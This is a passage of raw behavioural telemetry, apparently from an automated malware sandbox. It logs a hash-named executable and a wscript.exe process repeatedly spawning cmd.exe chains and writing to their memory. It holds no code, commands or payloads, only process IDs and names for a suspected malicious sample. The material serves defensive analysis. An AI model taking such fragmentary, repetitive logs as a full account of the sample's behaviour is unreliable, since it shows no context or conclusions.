1428 cmd.exe 100 PID 1428 wrote to memory of 1800 1428 cmd.exe 100 PID 1428 wrote to memory of 1220 1428 cmd.exe 101 PID 1428 wrote to memory of 1220 1428 cmd.exe 101 PID 1428 wrote to memory of 1220 1428 cmd.exe 101 PID 1428 wrote to memory of 1220 1428 cmd.exe 101 PID 1428 wrote to memory of 1216 1428 cmd.exe 102 PID 1428 wrote to memory of 1216 1428 cmd.exe 102 PID 1428 wrote to memory of 1216 1428 cmd.exe 102 PID 1428 wrote to memory of 1216 1428 cmd.exe 102 PID 1216 wrote to memory of 1748 1216 cmd.exe 103 PID 1216 wrote to memory of 1748 1216 cmd.exe 103 PID 1216 wrote to memory of 1748 1216 cmd.exe 103 PID 1216 wrote to memory of 1748 1216 cmd.exe 103 PID 1428 wrote to memory of 1188 1428 cmd.exe 104 PID 1428 wrote to memory of 1188 1428 cmd.exe 104 PID 1428 wrote to memory of 1188 1428 cmd.exe 104 PID 1428 wrote to memory of 1188 1428 cmd.exe 104 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 105 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 105 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 105 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 105 PID 1464 wrote to memory of 1500 1464 cmd.exe 107 PID 1464 wrote to memory of 1500 1464 cmd.exe 107 PID 1464 wrote to memory of 1500 1464 cmd.exe 107 PID 1464 wrote to memory of 1500 1464 cmd.exe 107 PID 1464 wrote to memory of 1120 1464 cmd.exe 108 PID 1464 wrote to memory of 1120 1464 cmd.exe 108 PID 1464 wrote to memory of 1120 1464 cmd.exe 108 PID 1464 wrote to memory of 1120 1464 cmd.exe 108 PID 1464 wrote to memory of 1640 1464 cmd.exe 109 PID 1464 wrote to memory of 1640 1464 cmd.exe 109 PID 1464 wrote to memory of 1640 1464 cmd.exe 109 PID 1464 wrote to memory of 1640 1464 cmd.exe 109 PID 1640 wrote to memory of 912 1640 cmd.exe 110 PID 1640 wrote to memory of 912 1640 cmd.exe 110 PID 1640 wrote to memory of 912 1640 cmd.exe 110 PID 1640 wrote to memory of 912 1640 cmd.exe 110 PID 1464 wrote to memory of 1416 1464 cmd.exe 111 PID 1464 wrote to memory of 1416 1464 cmd.exe 111 PID 1464 wrote to memory of 1416 1464 cmd.exe 111 PID 1464 wrote to memory of 1416 1464 cmd.exe 111 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 112 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 112 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 112 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 112 PID 1368 wrote to memory of 1860 1368 cmd.exe 114 PID 1368 wrote to memory of 1860 1368 cmd.exe 114 PID 1368 wrote to memory of 1860 1368 cmd.exe 114 PID 1368 wrote to memory of 1860 1368 cmd.exe 114 PID 1368 wrote to memory of 1608 1368 cmd.exe 115 PID 1368 wrote to memory of 1608 1368 cmd.exe 115 PID 1368 wrote to memory of 1608 1368 cmd.exe 115 PID 1368 wrote to memory of 1608 1368 cmd.exe 115 PID 1368 wrote to memory of 1036 1368 cmd.exe 116 PID 1368 wrote to memory of 1036 1368 cmd.exe 116 PID 1368 wrote to memory of 1036 1368 cmd.exe 116 PID 1368 wrote to memory of 1036 1368 cmd.exe 116 PID 1036 wrote to memory of 1832 1036 cmd.exe 117 PID 1036 wrote to memory of 1832 1036 cmd.exe 117 PID 1036 wrote to memory of 1832 1036 cmd.exe 117 PID 1036 wrote to memory of 1832 1036 cmd.exe 117 PID 1368 wrote to memory of 1840 1368 cmd.exe 118 PID 1368 wrote to memory of 1840 1368 cmd.exe 118 PID 1368 wrote to memory of 1840 1368 cmd.exe 118 PID 1368 wrote to memory of 1840 1368 cmd.exe 118 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 119 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 119 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 119 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 119 PID 1164 wrote to memory of 748 1164 cmd.exe 121 PID 1164 wrote to memory of 748 1164 cmd.exe 121 PID 1164 wrote to memory of 748 1164 cmd.exe 121 PID 1164 wrote to memory of 748 1164 cmd.exe 121 PID 1164 wrote to memory of 1040 1164 cmd.exe 122 PID 1164 wrote to memory of 1040 1164 cmd.exe 122 PID 1164 wrote to memory of 1040 1164 cmd.exe 122 PID 1164 wrote to memory of 1040 1164 cmd.exe 122 PID 1164 wrote to memory of 1216 1164 cmd.exe 123 PID 1164 wrote to memory of 1216 1164 cmd.exe 123 PID 1164 wrote to memory of 1216 1164 cmd.exe 123 PID 1164 wrote to memory of 1216 1164 cmd.exe 123 PID 1216 wrote to memory of 1460 1216 cmd.exe 124 PID 1216 wrote to memory of 1460 1216 cmd.exe 124 PID 1216 wrote to memory of 1460 1216 cmd.exe 124 PID 1216 wrote to memory of 1460 1216 cmd.exe 124 PID 1164 wrote to memory of 1752 1164 cmd.exe 125 PID 1164 wrote to memory of 1752 1164 cmd.exe 125 PID 1164 wrote to memory of 1752 1164 cmd.exe 125 PID 1164 wrote to memory of 1752 1164 cmd.exe 125 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 126 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 126 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 126 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 126 PID 1880 wrote to memory of 1444 1880 cmd.exe 128 PID 1880 wrote to memory of 1444 1880 cmd.exe 128 PID 1880 wrote to memory of 1444 1880 cmd.exe 128 PID 1880 wrote to memory of 1444 1880 cmd.exe 128 PID 1880 wrote to memory of 1992 1880 cmd.exe 129 PID 1880 wrote to memory of 1992 1880 cmd.exe 129 PID 1880 wrote to memory of 1992 1880 cmd.exe 129 PID 1880 wrote to memory of 1992 1880 cmd.exe 129 PID 1880 wrote to memory of 2020 1880 cmd.exe 130 PID 1880 wrote to memory of 2020 1880 cmd.exe 130 PID 1880 wrote to memory of 2020 1880 cmd.exe 130 PID 1880 wrote to memory of 2020 1880 cmd.exe 130 PID 2020 wrote to memory of 544 2020 cmd.exe 131 PID 2020 wrote to memory of 544 2020 cmd.exe 131 PID 2020 wrote to memory of 544 2020 cmd.exe 131 PID 2020 wrote to memory of 544 2020 cmd.exe 131 PID 1880 wrote to memory of 1464 1880 cmd.exe 132 PID 1880 wrote to memory of 1464 1880 cmd.exe 132 PID 1880 wrote to memory of 1464 1880 cmd.exe 132 PID 1880 wrote to memory of 1464 1880 cmd.exe 132 PID 1436 wrote to memory of 960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 133 PID 1436 wrote to memory of 960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 133 PID 1436 wrote to memory of 960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 133 PID 1436 wrote to memory of 960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 133 PID 960 wrote to memory of 1580 960 cmd.exe 135 PID 960 wrote to memory of 1580 960 cmd.exe 135 PID 960 wrote to memory of 1580 960 cmd.exe 135 PID 960 wrote to memory of 1580 960 cmd.exe 135 PID 960 wrote to memory of 792 960 cmd.exe 136 PID 960 wrote to memory of 792 960 cmd.exe 136 PID 960 wrote to memory of 792 960 cmd.exe 136 PID 960 wrote to memory of 792 960 cmd.exe 136 PID 960 wrote to memory of 1536 960 cmd.exe 137 PID 960 wrote to memory of 1536 960 cmd.exe 137 PID 960 wrote to memory of 1536 960 cmd.exe 137 PID 960 wrote to memory of 1536 960 cmd.exe 137 PID 1536 wrote to memory of 820 1536 cmd.exe 138 PID 1536 wrote to memory of 820 1536 cmd.exe 138 PID 1536 wrote to memory of 820 1536 cmd.exe 138 PID 1536 wrote to memory of 820 1536 cmd.exe 138 PID 960 wrote to memory of 892 960 cmd.exe 139 PID 960 wrote to memory of 892 960 cmd.exe 139 PID 960 wrote to memory of 892 960 cmd.exe 139 PID 960 wrote to memory of 892 960 cmd.exe 139 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 140 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 140 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 140 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 140 PID 748 wrote to memory of 1864 748 cmd.exe 143 PID 748 wrote to memory of 1864 748 cmd.exe 143 PID 748 wrote to memory of 1864 748 cmd.exe 143 PID 748 wrote to memory of 1864 748 cmd.exe 143 PID 748 wrote to memory of 1576 748 cmd.exe 144 PID 748 wrote to memory of 1576 748 cmd.exe 144 PID 748 wrote to memory of 1576 748 cmd.exe 144 PID 748 wrote to memory of 1576 748 cmd.exe 144 PID 748 wrote to memory of 1444 748 cmd.exe 145 PID 748 wrote to memory of 1444 748 cmd.exe 145 PID 748 wrote to memory of 1444 748 cmd.exe 145 PID 748 wrote to memory of 1444 748 cmd.exe 145 PID 1444 wrote to memory of 1992 1444 cmd.exe 146 PID 1444 wrote to memory of 1992 1444 cmd.exe 146 PID 1444 wrote to memory of 1992 1444 cmd.exe 146 PID 1444 wrote to memory of 1992 1444 cmd.exe 146 PID 748 wrote to memory of 2020 748 cmd.exe 147 PID 748 wrote to memory of 2020 748 cmd.exe 147 PID 748 wrote to memory of 2020 748 cmd.exe 147 PID 748 wrote to memory of 2020 748 cmd.exe 147 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 148 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 148 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 148 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 148 PID 1848 wrote to memory of 936 1848 cmd.exe 150 PID 1848 wrote to memory of 936 1848 cmd.exe 150 PID 1848 wrote to memory of 936 1848 cmd.exe 150 PID 1848 wrote to memory of 936 1848 cmd.exe 150 PID 1848 wrote to memory of 652 1848 cmd.exe 151 PID 1848 wrote to memory of 652 1848 cmd.exe 151 PID 1848 wrote to memory of 652 1848 cmd.exe 151 PID 1848 wrote to memory of 652 1848 cmd.exe 151 PID 1848 wrote to memory of 1368 1848 cmd.exe 152 PID 1848 wrote to memory of 1368 1848 cmd.exe 152 PID 1848 wrote to memory of 1368 1848 cmd.exe 152 PID 1848 wrote to memory of 1368 1848 cmd.exe 152 PID 1368 wrote to memory of 820 1368 cmd.exe 153 PID 1368 wrote to memory of 820 1368 cmd.exe 153 PID 1368 wrote to memory of 820 1368 cmd.exe 153 PID 1368 wrote to memory of 820 1368 cmd.exe 153 PID 1848 wrote to memory of 840 1848 cmd.exe 154 PID 1848 wrote to memory of 840 1848 cmd.exe 154 PID 1848 wrote to memory of 840 1848 cmd.exe 154 PID 1848 wrote to memory of 840 1848 cmd.exe 154 PID 1436 wrote to memory of 1400 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 155 PID 1436 wrote to memory of 1400 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 155 PID 1436 wrote to memory of 1400 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 155 PID 1436 wrote to memory of 1400 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 155 PID 1400 wrote to memory of 1248 1400 cmd.exe 157 PID 1400 wrote to memory of 1248 1400 cmd.exe 157 PID 1400 wrote to memory of 1248 1400 cmd.exe 157 PID 1400 wrote to memory of 1248 1400 cmd.exe 157 PID 1400 wrote to memory of 1864 1400 cmd.exe 158 PID 1400 wrote to memory of 1864 1400 cmd.exe 158 PID 1400 wrote to memory of 1864 1400 cmd.exe 158 PID 1400 wrote to memory of 1864 1400 cmd.exe 158 PID 1400 wrote to memory of 1576 1400 cmd.exe 159 PID 1400 wrote to memory of 1576 1400 cmd.exe 159 PID 1400 wrote to memory of 1576 1400 cmd.exe 159 PID 1400 wrote to memory of 1576 1400 cmd.exe 159 PID 1576 wrote to memory of 1500 1576 cmd.exe 160 PID 1576 wrote to memory of 1500 1576 cmd.exe 160 PID 1576 wrote to memory of 1500 1576 cmd.exe 160 PID 1576 wrote to memory of 1500 1576 cmd.exe 160 PID 1400 wrote to memory of 324 1400 cmd.exe 161 PID 1400 wrote to memory of 324 1400 cmd.exe 161 PID 1400 wrote to memory of 324 1400 cmd.exe 161 PID 1400 wrote to memory of 324 1400 cmd.exe 161 PID 1436 wrote to memory of 788 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 162 PID 1436 wrote to memory of 788 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 162 PID 1436 wrote to memory of 788 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 162 PID 1436 wrote to memory of 788 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 162 PID 788 wrote to memory of 1752 788 cmd.exe 164 PID 788 wrote to memory of 1752 788 cmd.exe 164 PID 788 wrote to memory of 1752 788 cmd.exe 164 PID 788 wrote to memory of 1752 788 cmd.exe 164 PID 788 wrote to memory of 268 788 cmd.exe 165 PID 788 wrote to memory of 268 788 cmd.exe 165 PID 788 wrote to memory of 268 788 cmd.exe 165 PID 788 wrote to memory of 268 788 cmd.exe 165 PID 788 wrote to memory of 544 788 cmd.exe 166 PID 788 wrote to memory of 544 788 cmd.exe 166 PID 788 wrote to memory of 544 788 cmd.exe 166 PID 788 wrote to memory of 544 788 cmd.exe 166 PID 544 wrote to memory of 1580 544 cmd.exe 167 PID 544 wrote to memory of 1580 544 cmd.exe 167 PID 544 wrote to memory of 1580 544 cmd.exe 167 PID 544 wrote to memory of 1580 544 cmd.exe 167 PID 788 wrote to memory of 652 788 cmd.exe 168 PID 788 wrote to memory of 652 788 cmd.exe 168 PID 788 wrote to memory of 652 788 cmd.exe 168 PID 788 wrote to memory of 652 788 cmd.exe 168 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 169 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 169 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 169 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 169 PID 820 wrote to memory of 840 820 cmd.exe 171 PID 820 wrote to memory of 840 820 cmd.exe 171 PID 820 wrote to memory of 840 820 cmd.exe 171 PID 820 wrote to memory of 840 820 cmd.exe 171 PID 820 wrote to memory of 1268 820 cmd.exe 172 PID 820 wrote to memory of 1268 820 cmd.exe 172 PID 820 wrote to memory of 1268 820 cmd.exe 172 PID 820 wrote to memory of 1268 820 cmd.exe 172 PID 820 wrote to memory of 960 820 cmd.exe 173 PID 820 wrote to memory of 960 820 cmd.exe 173 PID 820 wrote to memory of 960 820 cmd.exe 173 PID 820 wrote to memory of 960 820 cmd.exe 173 PID 960 wrote to memory of 1796 960 cmd.exe 174 PID 960 wrote to memory of 1796 960 cmd.exe 174 PID 960 wrote to memory of 1796 960 cmd.exe 174 PID 960 wrote to memory of 1796 960 cmd.exe 174 PID 820 wrote to memory of 1864 820 cmd.exe 175 PID 820 wrote to memory of 1864 820 cmd.exe 175 PID 820 wrote to memory of 1864 820 cmd.exe 175 PID 820 wrote to memory of 1864 820 cmd.exe 175 PID 1436 wrote to memory of 1500 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 176 PID 1436 wrote to memory of 1500 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 176 PID 1436 wrote to memory of 1500 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 176 PID 1436 wrote to memory of 1500 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 176 PID 1500 wrote to memory of 324 1500 cmd.exe 178 PID 1500 wrote to memory of 324 1500 cmd.exe 178 PID 1500 wrote to memory of 324 1500 cmd.exe 178 PID 1500 wrote to memory of 324 1500 cmd.exe 178 PID 1500 wrote to memory of 1312 1500 cmd.exe 179 PID 1500 wrote to memory of 1312 1500 cmd.exe 179 PID 1500 wrote to memory of 1312 1500 cmd.exe 179 PID 1500 wrote to memory of 1312 1500 cmd.exe 179 PID 1500 wrote to memory of 1460 1500 cmd.exe 180 PID 1500 wrote to memory of 1460 1500 cmd.exe 180 PID 1500 wrote to memory of 1460 1500 cmd.exe 180 PID 1500 wrote to memory of 1460 1500 cmd.exe 180 PID 1460 wrote to memory of 612 1460 cmd.exe 181 PID 1460 wrote to memory of 612 1460 cmd.exe 181 PID 1460 wrote to memory of 612 1460 cmd.exe 181 PID 1460 wrote to memory of 612 1460 cmd.exe 181 PID 1500 wrote to memory of 268 1500 cmd.exe 182 PID 1500 wrote to memory of 268 1500 cmd.exe 182 PID 1500 wrote to memory of 268 1500 cmd.exe 182 PID 1500 wrote to memory of 268 1500 cmd.exe 182 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 183 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 183 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 183 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 183 PID 1032 wrote to memory of 940 1032 cmd.exe 185 PID 1032 wrote to memory of 940 1032 cmd.exe 185 PID 1032 wrote to memory of 940 1032 cmd.exe 185 PID 1032 wrote to memory of 940 1032 cmd.exe 185 PID 1032 wrote to memory of 788 1032 cmd.exe 186 PID 1032 wrote to memory of 788 1032 cmd.exe 186 PID 1032 wrote to memory of 788 1032 cmd.exe 186 PID 1032 wrote to memory of 788 1032 cmd.exe 186 PID 1032 wrote to memory of 1220 1032 cmd.exe 187 PID 1032 wrote to memory of 1220 1032 cmd.exe 187 PID 1032 wrote to memory of 1220 1032 cmd.exe 187 PID 1032 wrote to memory of 1220 1032 cmd.exe 187 PID 1220 wrote to memory of 1848 1220 cmd.exe 188 PID 1220 wrote to memory of 1848 1220 cmd.exe 188 PID 1220 wrote to memory of 1848 1220 cmd.exe 188 PID 1220 wrote to memory of 1848 1220 cmd.exe 188 PID 1032 wrote to memory of 1268 1032 cmd.exe 189 PID 1032 wrote to memory of 1268 1032 cmd.exe 189 PID 1032 wrote to memory of 1268 1032 cmd.exe 189 PID 1032 wrote to memory of 1268 1032 cmd.exe 189 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 190 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 190 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 190 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 190 PID 1248 wrote to memory of 1864 1248 cmd.exe 192 PID 1248 wrote to memory of 1864 1248 cmd.exe 192 PID 1248 wrote to memory of 1864 1248 cmd.exe 192 PID 1248 wrote to memory of 1864 1248 cmd.exe 192 PID 1248 wrote to memory of 1720 1248 cmd.exe 193 PID 1248 wrote to memory of 1720 1248 cmd.exe 193 PID 1248 wrote to memory of 1720 1248 cmd.exe 193 PID 1248 wrote to memory of 1720 1248 cmd.exe 193 PID 1248 wrote to memory of 1444 1248 cmd.exe 194 PID 1248 wrote to memory of 1444 1248 cmd.exe 194 PID 1248 wrote to memory of 1444 1248 cmd.exe 194 PID 1248 wrote to memory of 1444 1248 cmd.exe 194 PID 1444 wrote to memory of 1816 1444 cmd.exe 195 PID 1444 wrote to memory of 1816 1444 cmd.exe 195 PID 1444 wrote to memory of 1816 1444 cmd.exe 195 PID 1444 wrote to memory of 1816 1444 cmd.exe 195 PID 1248 wrote to memory of 1312 1248 cmd.exe 196 PID 1248 wrote to memory of 1312 1248 cmd.exe 196 PID 1248 wrote to memory of 1312 1248 cmd.exe 196 PID 1248 wrote to memory of 1312 1248 cmd.exe 196 PID 1436 wrote to memory of 604 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 197 PID 1436 wrote to memory of 604 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 197 PID 1436 wrote to memory of 604 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 197 PID 1436 wrote to memory of 604 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 197 PID 604 wrote to memory of 268 604 cmd.exe 199 PID 604 wrote to memory of 268 604 cmd.exe 199 PID 604 wrote to memory of 268 604 cmd.exe 199 PID 604 wrote to memory of 268 604 cmd.exe 199 PID 604 wrote to memory of 1992 604 cmd.exe 200 PID 604 wrote to memory of 1992 604 cmd.exe 200 PID 604 wrote to memory of 1992 604 cmd.exe 200 PID 604 wrote to memory of 1992 604 cmd.exe 200 PID 604 wrote to memory of 936 604 cmd.exe 201 PID 604 wrote to memory of 936 604 cmd.exe 201 PID 604 wrote to memory of 936 604 cmd.exe 201 PID 604 wrote to memory of 936 604 cmd.exe 201 PID 936 wrote to memory of 652 936 cmd.exe 202 PID 936 wrote to memory of 652 936 cmd.exe 202 PID 936 wrote to memory of 652 936 cmd.exe 202 PID 936 wrote to memory of 652 936 cmd.exe 202 PID 604 wrote to memory of 788 604 cmd.exe 203 PID 604 wrote to memory of 788 604 cmd.exe 203 PID 604 wrote to memory of 788 604 cmd.exe 203 PID 604 wrote to memory of 788 604 cmd.exe 203 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 204 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 204 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 204 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 204 PID 1848 wrote to memory of 1268 1848 cmd.exe 206 PID 1848 wrote to memory of 1268 1848 cmd.exe 206 PID 1848 wrote to memory of 1268 1848 cmd.exe 206 PID 1848 wrote to memory of 1268 1848 cmd.exe 206 PID 1760 wrote to memory of 1768 1760 wscript.exe 207 PID 1760 wrote to memory of 1768 1760 wscript.exe 207 PID 1760 wrote to memory of 1768 1760 wscript.exe 207 PID 1760 wrote to memory of 1768 1760 wscript.exe 207 PID 1848 wrote to memory of 1196 1848 cmd.exe 209 PID 1848 wrote to memory of 1196 1848 cmd.exe 209 PID 1848 wrote to memory of 1196 1848 cmd.exe 209 PID 1848 wrote to memory of 1196 1848 cmd.exe 209 PID 1848 wrote to memory of 1536 1848 cmd.exe 210 PID 1848 wrote to memory of 1536 1848 cmd.exe 210 PID 1848 wrote to memory of 1536 1848 cmd.exe 210 PID 1848 wrote to memory of 1536 1848 cmd.exe 210 PID 1536 wrote to memory of 1400 1536 cmd.exe 211 PID 1536 wrote to memory of 1400 1536 cmd.exe 211 PID 1536 wrote to memory of 1400 1536 cmd.exe 211 PID 1536 wrote to memory of 1400 1536 cmd.exe 211 PID 1768 wrote to memory of 1188 1768 cmd.exe 212 PID 1768 wrote to memory of 1188 1768 cmd.exe 212 PID 1768 wrote to memory of 1188 1768 cmd.exe 212 PID 1768 wrote to memory of 1188 1768 cmd.exe 212 PID 1848 wrote to memory of 1640 1848 cmd.exe 213 PID 1848 wrote to memory of 1640 1848 cmd.exe 213 PID 1848 wrote to memory of 1640 1848 cmd.exe 213 PID 1848 wrote to memory of 1640 1848 cmd.exe 213 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 214 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 214 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 214 PID 1436 wrote to memory of 1164 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 214 PID 1164 wrote to memory of 1064 1164 cmd.exe 216 PID 1164 wrote to memory of 1064 1164 cmd.exe 216 PID 1164 wrote to memory of 1064 1164 cmd.exe 216 PID 1164 wrote to memory of 1064 1164 cmd.exe 216 PID 1164 wrote to memory of 1992 1164 cmd.exe 217 PID 1164 wrote to memory of 1992 1164 cmd.exe 217 PID 1164 wrote to memory of 1992 1164 cmd.exe 217 PID 1164 wrote to memory of 1992 1164 cmd.exe 217 PID 1164 wrote to memory of 932 1164 cmd.exe 218 PID 1164 wrote to memory of 932 1164 cmd.exe 218 PID 1164 wrote to memory of 932 1164 cmd.exe 218 PID 1164 wrote to memory of 932 1164 cmd.exe 218 PID 932 wrote to memory of 748 932 cmd.exe 219 PID 932 wrote to memory of 748 932 cmd.exe 219 PID 932 wrote to memory of 748 932 cmd.exe 219 PID 932 wrote to memory of 748 932 cmd.exe 219 PID 1164 wrote to memory of 1880 1164 cmd.exe 220 PID 1164 wrote to memory of 1880 1164 cmd.exe 220 PID 1164 wrote to memory of 1880 1164 cmd.exe 220 PID 1164 wrote to memory of 1880 1164 cmd.exe 220 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 221 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 221 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 221 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 221 PID 1608 wrote to memory of 1268 1608 cmd.exe 223 PID 1608 wrote to memory of 1268 1608 cmd.exe 223 PID 1608 wrote to memory of 1268 1608 cmd.exe 223 PID 1608 wrote to memory of 1268 1608 cmd.exe 223 PID 1608 wrote to memory of 1864 1608 cmd.exe 224 PID 1608 wrote to memory of 1864 1608 cmd.exe 224 PID 1608 wrote to memory of 1864 1608 cmd.exe 224 PID 1608 wrote to memory of 1864 1608 cmd.exe 224 PID 1608 wrote to memory of 1748 1608 cmd.exe 225 PID 1608 wrote to memory of 1748 1608 cmd.exe 225 PID 1608 wrote to memory of 1748 1608 cmd.exe 225 PID 1608 wrote to memory of 1748 1608 cmd.exe 225 PID 1748 wrote to memory of 1400 1748 cmd.exe 226 PID 1748 wrote to memory of 1400 1748 cmd.exe 226 